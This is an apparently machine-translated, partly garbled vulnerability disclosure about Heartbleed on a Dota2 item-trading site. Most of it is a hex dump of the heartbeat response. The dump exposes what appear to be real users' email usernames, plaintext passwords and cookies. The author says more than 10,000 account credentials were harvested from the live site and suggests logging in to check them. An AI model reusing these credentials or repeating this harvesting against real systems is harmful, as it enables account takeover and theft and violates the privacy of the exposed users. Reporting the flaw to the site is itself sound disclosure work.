Improper O & M of Dota2 jewelry transactions exposes usernames and passwords and cookies (10 K + account passwords are collected)
Dota2 jewelry Trading Market improper O & M leakage of usernames and passwords and cookies (10 K + account password collected) has been deleted after testing
RT Dota2 jewelry trading market main site http://www.dota2sp.com/exist HeartBleed plaintext leakage username and password cookies... This vulnerability may cause further harm (for example, the user name and password are used for dictionary tests on mainstream Chinese websites .. The account contains cash, weapons, and equipment... Although I have not played games for N years .. --
Heartbleed Vulnerability (Heartbleed bug), also referred to as Heartbleed vulnerability, is a program error that occurs in the encryption library OpenSSL. It was first disclosed in April 2014. This library is widely used to implement Transport Layer Security (TLS) protocols on the Internet. As long as you use a defective OpenSSL instance, both the server and the client may be attacked. This problem occurs because the input is not properly verified (the border check is missing) [3] During TLS heartbeat scaling. Therefore, the vulnerability name comes from heartbeat) [4]. The program error is a buffer read [5], that is, the data that can be read is more than the data that should be allowed to be read [6]
ZZ wiki
...
Let's test the image first...
Scanning www.dota2sp.com on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 4757
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 6F 6E 6E 65 ....#.......onne
00e0: 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 ction: Keep-Aliv
00f0: 65 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 64 6F 74 e..Host: www.dot
0100: 61 32 73 70 2E 63 6F 6D 0D 0A 55 73 65 72 2D 41 a2sp.com..User-A
0110: 67 65 6E 74 3A 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 gent:Mozilla/5.0
0120: 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53 (compatible; MS
0130: 49 45 20 39 2E 30 3B 20 57 69 6E 64 6F 77 73 20 IE 9.0; Windows
0140: 4E 54 20 36 2E 31 3B 20 54 72 69 64 65 6E 74 2F NT 6.1; Trident/
0150: 35 2E 30 29 3B 20 33 36 30 53 70 69 64 65 72 0D 5.0); 360Spider.
0160: 0A 0D 0A 5B 1C FB 9F 6A 25 1A A5 F9 85 24 B5 FE ...[...j%....$..
0170: 01 A1 4F 78 16 DD 63 32 5B 8F 60 00 F1 6B EE FC ..Ox..c2[.`..k..
0180: C4 53 68 99 85 D6 00 BA 51 3E EB 61 A7 C3 D6 D8 .Sh.....Q>.a....
0190: 58 FB 3C 8B 9F 77 77 77 2D 66 6F 72 6D 2D 75 72 X.<..www-form-ur
01a0: 6C 65 6E 63 6F 64 65 64 0D 0A 52 65 66 65 72 65 lencoded..Refere
01b0: 72 3A 20 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 r: https://www.d
01c0: 6F 74 61 32 73 70 2E 63 6F 6D 2F 73 73 6C 2F 6C ota2sp.com/ssl/l
01d0: 6F 67 69 6E 0D 0A 41 63 63 65 70 74 2D 45 6E 63 ogin..Accept-Enc
01e0: 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 oding: gzip, def
01f0: 6C 61 74 65 0D 0A 41 63 63 65 70 74 2D 4C 61 6E late..Accept-Lan
0200: 67 75 61 67 65 3A 20 7A 68 2D 43 4E 2C 7A 68 3B guage: zh-CN,zh;
0210: 71 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A 20 48 q=0.8..Cookie: H
0220: 6D 5F 6C 76 74 5F 33 38 66 62 39 37 39 31 37 30 m_lvt_38fb979170
0230: 35 38 37 61 66 65 62 30 37 63 35 65 30 65 35 39 587afeb07c5e0e59
0240: 65 38 36 34 36 35 3D 31 34 35 33 38 35 39 36 36 e86465=145385966
0250: 35 3B 20 48 6D 5F 6C 70 76 74 5F 33 38 66 62 39 5; Hm_lpvt_38fb9
0260: 37 39 31 37 30 35 38 37 61 66 65 62 30 37 63 35 79170587afeb07c5
0270: 65 30 65 35 39 65 38 36 34 36 35 3D 31 34 35 33 e0e59e86465=1453
0280: 38 35 39 36 36 37 0D 0A 0D 0A 72 75 72 6C 3D 25 859667....rurl=%
0290: 32 46 73 73 6C 25 32 46 6C 6F 67 69 6E 26 55 73 2Fssl%2Flogin&Us
02a0: 65 72 4E 61 6D 65 3D 35 38 32 34 34 33 34 39 34 erName=582443494
02b0: 25 34 30 71 71 2E 63 6F 6D 26 50 61 73 73 77 6F %40qq.com&Passwo
02c0: 72 64 3D 6E 69 61 6E 31 31 30 33 32 34 70 E6 2B rd=nian110324p.+
02d0: 7E 62 F4 1B 86 27 D3 10 02 0F 98 3A B7 34 37 32 ~b...'.....:.472
02e0: 30 36 35 38 32 25 34 30 71 71 2E 63 6F 6D 26 50 06582%40qq.com&P
02f0: 61 73 73 77 6F 72 64 3D 67 78 73 72 7A 31 32 33 assword=gxsrz123
0300: 34 35 70 93 F4 AA EE 85 82 52 70 C2 82 BB 1B 92 45p......Rp.....
0310: 0A 0F 64 3D 79 6C 6D 69 68 61 6E 67 69 36 21 9F ..d=ylmihangi6!.
0320: 67 EB 73 AD E7 29 D7 10 0F AC FD 96 C4 AD 4C EB g.s..)........L.
0330: 9D FC 79 16 6B 69 E8 99 66 22 B1 9C 5A B9 C2 A2 ..y.ki..f"..Z...
0340: 58 C7 82 91 B7 C9 F7 2C 31 34 35 33 38 35 37 35 X......,14538575
0350: 37 32 2C 31 34 35 33 38 35 39 32 37 34 3B 20 48 72,1453859274; H
0360: 6D 5F 6C 70 76 74 5F 33 38 66 62 39 37 39 31 37 m_lpvt_38fb97917
0370: 30 35 38 37 61 66 65 62 30 37 63 35 65 30 65 35 0587afeb07c5e0e5
0380: 39 65 38 36 34 36 35 3D 31 34 35 33 38 35 39 32 9e86465=14538592
0390: 39 31 0D 0A 0D 0A 72 75 72 6C 3D 25 32 46 6D 79 91....rurl=%2Fmy
03a0: 74 72 61 64 65 73 26 55 73 65 72 4E 61 6D 65 3D trades&UserName=
03b0: 38 33 34 39 37 36 39 37 33 40 71 71 2E 63 6F 6D [email protected]
03c0: 26 50 61 73 73 77 6F 72 64 3D 61 31 33 30 30 33 &Password=a13003
03d0: 33 32 32 35 35 35 DB 07 E4 B3 BE 67 F0 26 A3 D2 322555.....g.&..
03e0: 15 3B 0F D7 07 ED 9E 47 7A 02 05 05 05 05 05 05 .;.....Gz.......
03f0: 57 21 DD 4C B2 5C 9B 32 84 15 AE A5 DB 68 F3 CD W!.L.\.2.....h..
0400: C3 D1 F7 83 CB FA 9B 21 F4 B7 21 9C C7 37 8A 68 .......!..!..7.h
0410: 6E B8 DA 4C 67 DA A3 14 F8 94 F3 E7 E3 DA 18 F6 n..Lg...........
0420: 71 5F AB 72 DF 57 E9 29 3D BD 76 16 AA 19 D4 81 q_.r.W.)=.v.....
0430: 02 E7 0B 47 B6 1E A5 79 79 C6 D7 98 E7 8C 42 7E ...G...yy.....B~
0440: D8 48 0C 26 CF D1 D8 DE 5C 9B A0 4E C5 6C D7 36 .H.&....\..N.l.6
0450: C4 16 B5 E3 29 55 FA C3 E7 62 B5 31 48 74 5C 21 ....)U...b.1Ht\!
0460: A4 E4 5F A5 3E C1 0A 3A F7 15 CA C9 82 B5 1F C1 .._.>..:........
0470: 96 96 5F 4D 85 87 64 00 C1 CC 88 54 9D 20 75 31 .._M..d....T. u1
0480: 69 93 C7 2E 62 8E 35 73 83 D8 52 9A AF CA DD 16 i...b.5s..R.....
0490: EC F8 DE 37 FA 21 3D BE EE CB D7 BF A1 3D 03 1D ...7.!=......=..
04a0: 19 21 DB AB 8B BD F2 87 5A 95 AB 67 BC C6 60 BD .!......Z..g..`.
04b0: 68 1B AF 03 15 5A 54 46 41 AB 72 7B 3C 81 95 28 h....ZTFA.r{<..(
04c0: 8F D2 E3 C8 20 BE D3 0D DC 14 4E 5C C0 92 0D 27 .... .....N\...'
。。。。。。。。。。。。。
。。。。。。。。。。。。。。。。
WARNING: server www.dota2sp.com returned more data than it should - server is vulnerable!
A 10 k account password has been collected for the test. (vim already exists. Review it here.
However, you must first use sort.
(The collected account password has been deleted)
Just log on and check it out.
Solution:
Fix issue ....
Do you have a gift...
.. Notify the user to change the password